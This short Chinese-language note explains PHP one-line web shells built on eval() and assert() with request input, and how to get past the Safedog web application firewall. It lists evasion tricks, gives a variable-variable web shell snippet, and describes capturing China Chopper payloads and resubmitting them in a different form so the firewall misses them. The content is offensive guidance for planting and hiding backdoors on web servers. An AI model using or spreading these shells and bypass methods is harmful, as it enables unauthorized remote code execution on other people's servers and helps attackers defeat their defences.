php 中提供两个函数eval(),assert(),这两个函数提供代码执行,以$_GET["x"],等等接受代码执行,这就是一句话
现在有安全狗,没办法只能做过狗处理了
现在已知的有加解密,函数倒转,拼接,变量覆盖
比如,变量覆盖:
<?php
$a = $_GET["x"];
$b = $_GET["y"];
$$a($_POST["qq"]);
>
这个方法已经不能过4.0的狗了,但是思路还可以
3.5及以前的安全狗在防护网马时,检查数据包中是否有菜刀的特征,如果有,立刻封杀,2 会检查提交的参数,会跟踪参数,进行行为监控
所以,3.5过狗方法1改变菜刀数据包的提交方式2改变菜刀的数据包的循序
用WSockExpert.exe抓取菜刀的Payload
重改提交方式,并将数据包解码,绕过安全狗